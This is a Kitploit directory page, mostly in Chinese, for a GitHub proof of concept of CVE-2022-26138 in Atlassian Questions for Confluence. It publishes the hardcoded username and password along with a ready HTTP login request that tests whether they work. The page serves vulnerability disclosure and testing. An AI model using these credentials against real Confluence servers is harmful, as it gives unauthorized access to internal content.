Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-26138 — Atlassian Questions 硬编码密码 (CVE-2022-26138) | Kitploit
工具/GitHubGitHub/alcaparra/cve-2022-26138
密码攻击漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubalcaparra/cve-2022-26138

CVE-2022-26138

Atlassian Questions 硬编码密码 (CVE-2022-26138)

查看仓库
311034年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-26138 POC

questions_cve

描述

root@kitploit:~
The Atlassian Questions For Confluence app for Confluence Server and Data Center 
creates a Confluence user account in the confluence-users group with 
the username disabledsystemuser and a hardcoded password. A remote, 
unauthenticated attacker with knowledge of the hardcoded password could
exploit this to log into Confluence and access all content accessible 
to users in the confluence-users group. 
This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.

POC

硬编码凭据:

  • 用户:disabledsystemuser
  • 密码:disabled1system1user6708

漏洞利用

root@kitploit:~
POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded

os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action

如果服务器重定向到 /vulnerable.action,则凭据有效。

这些凭据是从哪里获得的?

硬编码凭据就明晃晃地写在受影响插件的 jar 文件中

https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar

参考链接

  • https://www.cvedetails.com/cve/CVE-2022-26138/
  • https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
  • https://jira.atlassian.com/browse/CONFSERVER-79483
下载工具